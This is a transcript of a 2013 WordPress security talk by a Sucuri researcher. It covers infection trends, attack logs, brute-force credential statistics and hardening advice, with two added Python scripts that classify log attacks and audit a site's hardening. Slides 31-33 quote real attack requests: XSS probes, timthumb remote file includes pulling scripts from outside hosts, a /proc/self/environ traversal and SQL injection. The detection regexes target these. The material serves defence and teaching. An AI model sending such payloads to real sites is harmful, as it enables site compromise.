WordPress Website Security


  1. WordPress Website Security
  2. Tony Perez | @perezbox | @sucuri_security (5/1/2013)
     Specialization: Website Security, Incident Handling, Log Analysis
     Special Interests: Warfare, Weapons, Martial Arts
  3. - Website Security Company
     - Global Operations
     - All Website Platforms
     - Scan 1M Unique Domains a Month
     - Block 1M web attacks a Month
     - 300 – 500 websites a day
     - Signature / Heuristic Based
     - 24/5 - 18/2 operations
  4. Trends, Threats, Defenses. SIMPLE RIGHT?
  5. (no text on slide)
  6. Malicious Links – 2011 / 2012
  7. (no text on slide)
  8. Known Malware / Unknown Malware
  9. Not Infected / Infected
  10. Infection breakdown:
      - 26% Remote iFrame Includes
      - 19% Remote JavaScript Includes
      - 16% SPAM Injections
      - 14% Obfuscated / Encoded JavaScript
      - 11% Conditional Redirects
      - 4% Defacements
      - 10% Other
  11. Apache, SSH, Email Server. Going deeper than the application layer, targeting the server. Server Polymorphism – a.k.a. changes a lot
  12. - Stick With Reputable Sources
      - Gravity Forms
      - JetPack Forms
      - Generating SPAM emails, resource hogs
      - IP blacklisting
      - Leverage Captchas
  13. (no text on slide)
  14. Pharmacy, Payday Loans
  15. Access – so easy, yet so weak
  16. (no text on slide)
  17. (no text on slide)
  18. Site 1 – WordPress 2.8; Site 2 – WordPress 3.5.1; Site 3 – WordPress 3.4.2; Site 4 – WordPress 3.0
  19. (no text on slide)
  20. (no text on slide)
  21. (no text on slide)
  22. (no text on slide)
  23. (no text on slide)
  24. (no text on slide)
  25. - W3TC & WP Super Cache Remote Command Execution (RCE) Vulnerability
      - WPMM SPAM Injections (Bad Plugin)
      - Social Media Widget SPAM Injections (Core Commit)
  26. - Explosion in the Malware as a Service (MaaS) trade
      - Yes, pay someone to hack for you
      - Different tools to break in and generate payloads
      - Brute force and vulnerability exploits
      - Malware Payloads
      - Blackhole Exploit Kit – Today's market leader (2013 – SophosLabs)
  27. (no text on slide)
  28. (no text on slide)
  29. (no text on slide)
  30. What kind of website do you have? Use for malware? Burrow into network? Steal data?
  31. Stored / Reflective
      38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
      123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
  32. [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
      83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
      82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
  33. 62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT; en-us) Firefox/3.5.9"
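The request lines on slides 31-33 are the raw material of the log analysis the deck talks about. The following Python is added here and is not part of the presentation: it percent-decodes each request target before matching, so encoding cannot hide a payload, and tags each line with the pattern family the slides illustrate (XSS, remote file include, traversal, SQL injection). The signature set and the one benign line are constructed for illustration; the other sample lines are quoted, abridged, from the slides.

```python
import re
from urllib.parse import unquote_plus

# Request lines quoted (abridged) from slides 31-33, plus one constructed benign line.
SAMPLE_LOG = [
    '38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227',
    '123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268',
    '[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983',
    '82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 -',
    '62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336',
    '203.0.113.7 - - [03/Apr/2013:06:00:00 -0400] "GET /wp-login.php HTTP/1.1" 200 1234',  # constructed, benign
]

# Combined-log prefix; the client IP is optional because one line in the deck was captured without it.
LOG_RE = re.compile(r'^(?:(?P<ip>\S+) \S+ \S+ )?\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)')

# Constructed signatures, applied in this order to the percent-decoded request target.
RULES = [
    ("rfi", re.compile(r'[?&](?:src|file|url|page|path)=(?:https?|ftp)://', re.I)),
    ("traversal", re.compile(r'(?:\.\./){2,}|/proc/self/environ|\x00')),
    ("sqli", re.compile(r'\bunion\b.{0,20}\bselect\b|\bor\b\s+\d+=\d+', re.I)),
    ("xss", re.compile(r'<\s*/?\s*(?:script|img|iframe|svg)\b|\bon(?:error|load|click)\s*=', re.I)),
]

def classify(line):
    """Return (ip, category, decoded target), or None when the line is not a request line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote_plus(m.group("target"))   # decode first: %3C..%3E and '+' must not mask a payload
    for name, rx in RULES:
        if rx.search(target):
            return (m.group("ip") or "?", name, target)
    return (m.group("ip") or "?", "benign", target)

def summarize(lines):
    """Tally hits per category, the overview a daily log review starts from."""
    counts = {}
    for hit in filter(None, map(classify, lines)):
        counts[hit[1]] = counts.get(hit[1], 0) + 1
    return counts
```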
  34. (no text on slide)
  35. (no text on slide)
  36. - Brand Reputation
      - Legal Implications
      - Impact to Sales
      - Blacklisted by Search Engines
      - Blacklisted by Payment processors
      - Worst Day Of your Life
  37. (no text on slide)
  38. Access Control, Vulnerabilities, Hosting, Online Habits, Social Media, Passwords
  39. "It's about risk reduction… risk will never be zero…"
  40. - We run on WordPress
      - Current Version of course
      - Sucuri properties suffer: ~125,000 web based attacks a month on average
      - ~4,000 attacks a day (this spikes on occasion)
      - Doesn't include server level attacks
      - All flavors of attacks
  41. - Instead of telling you what you need to do, I'll just tell you what we do;
      - Our philosophy and approach is very simple: complex things break in complex ways;
      - We focus on the areas that we can immediately control;
      - We believe in layered defenses;
  42. Stay Current, IP Whitelisting, Two Factor Authentication, Strong / Unique Password, Web Application Firewall
  43. IP Whitelisting, Server Isolation, Public Key Authentication, Host Intrusion Detection System (HIDS), Log Everything
  44. Category | Tool | Type
      Prevention – Software Vulnerabilities | Sucuri CloudProxy | Service
      Prevention – Access Control | Sucuri CloudProxy | Service
      Detection | Sucuri Monitoring | Service
      Remediation | Sucuri | Service
      Password Management | 1Password / LastPass | Application
      Host-based Intrusion Detection System | OSSEC | Application
      Access Control Enforcement | Login Secure Solutions | Plugin
      Two-Factor Authentication | Google Authenticator | Plugin
      Application Auditing | Sucuri Premium | Plugin
      Backups | BackupBuddy | Plugin
  45. Category | Location | Type
      Disable Theme / Plugin Editor | wp-config.php | Preventive measure
      Disable PHP execution | .htaccess – uploads / images / wp-includes / etc. | Preventive measure
      Permissions | Directories 755 / Files 644 | Preventive measure
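The three preventive measures on slide 45 can be checked mechanically. The following Python audit is added here and is not taken from the deck or from Sucuri: it verifies that wp-config.php defines DISALLOW_FILE_EDIT, that the directories the slide names carry a PHP-denying .htaccess, and that directories are 755 and files 644, and it builds a constructed WordPress-like tree to run against. The directory list (uploads and wp-includes) and the FilesMatch / Require all denied form of the .htaccess rule are the author's assumptions of one common setup.

```python
import os, re, stat, tempfile

DIR_MODE, FILE_MODE = 0o755, 0o644                      # the deck's permission scheme
NO_EXEC_DIRS = ["wp-content/uploads", "wp-includes"]    # assumed subset of the directories slide 45 names
EDIT_RX = re.compile(r"""define\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)""", re.I)
NOPHP_RX = re.compile(r"<Files(?:Match)?[^>]*php[^>]*>.*?(?:deny from all|Require all denied).*?</Files(?:Match)?>",
                      re.I | re.S)

def read(path):
    return open(path, errors="replace").read() if os.path.isfile(path) else ""

def audit(root):
    # Returns (check, relative path) findings; an empty list means all three measures are in place.
    findings = []
    if not EDIT_RX.search(read(os.path.join(root, "wp-config.php"))):
        findings.append(("file-editor-enabled", "wp-config.php"))
    for rel in NO_EXEC_DIRS:
        if not NOPHP_RX.search(read(os.path.join(root, rel, ".htaccess"))):
            findings.append(("php-execution-allowed", rel))
    for dirpath, dirnames, filenames in os.walk(root):
        entries = [(d, DIR_MODE, "dir-perms") for d in dirnames] + [(f, FILE_MODE, "file-perms") for f in filenames]
        for name, want, tag in entries:
            p = os.path.join(dirpath, name)
            if stat.S_IMODE(os.stat(p).st_mode) != want:
                findings.append((tag, os.path.relpath(p, root)))
    return findings

def make_demo_site(root, hardened):
    # Constructed WordPress-like tree: hardened per slide 45, or deliberately sloppy (world-writable, no rules).
    for rel in NO_EXEC_DIRS + ["wp-content/themes/demo"]:
        os.makedirs(os.path.join(root, rel), exist_ok=True)
    files = {"wp-config.php": "<?php\n" + ("define('DISALLOW_FILE_EDIT', true);\n" if hardened else ""),
             "wp-content/themes/demo/style.css": "/* demo */\n"}
    for rel in (NO_EXEC_DIRS if hardened else []):
        files[rel + "/.htaccess"] = '<FilesMatch "\\.php$">\n  Require all denied\n</FilesMatch>\n'
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as f:
            f.write(body)
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            os.chmod(os.path.join(dirpath, d), DIR_MODE if hardened else 0o777)
        for fn in filenames:
            os.chmod(os.path.join(dirpath, fn), FILE_MODE if hardened else 0o666)

def demo(hardened):
    # Build a fresh constructed tree in a temporary directory and audit it.
    root = tempfile.mkdtemp()
    make_demo_site(root, hardened)
    return audit(root)
```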
  46. Don't know what you're doing? Go with a managed host…
  47. Doesn't mean you won't ever get infected.
  48. Complex . Long . Unique . Esoteric – "CLUE"
      Usernames seen in brute-force attempts:
      - 652,911 admin
      - 10,173 test
      - 8,992 administrator
      - 8,921 Admin
      - 2,495 root
      Passwords seen in brute-force attempts:
      - 16,798 admin
      - 10,880 123456
      - 9,727 666666
      - 9,106 111111
      - 7,882 12345678
      - 7,717 qwerty
      - 7,295 1234567
      Epic Fail
  49. - Access: Login Secure Solution, Stealth Login, Limit Login
      - Scanning: WordFence, Anti-Malwatch
      - Defense in Depth: BetterWP Security, BulletProof Security
      - Vulnerabilities: MVIS Security Center
  50. Name | URL
      Sucuri Blog | http://blog.sucuri.net
      SucuriTV | http://sucuri.tv
      WordPress Forum – Hacked | http://wordpress.org/tags/hacked
      WordPress Forum – Malware | http://wordpress.org/tags/malware
      Badware Busters | https://badwarebusters.org
      Perishable Press | http://perishablepress.com/category/web-design/security/
      Google Forums | http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
      WordPress.org Hardening | http://codex.wordpress.org/Hardening_WordPress
      Google Webmaster Tools | http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
      Secunia Security Advisories | http://secunia.com/community/advisories/search/?search=wordpress
      Exploit-DB | http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
  51. (no text on slide)
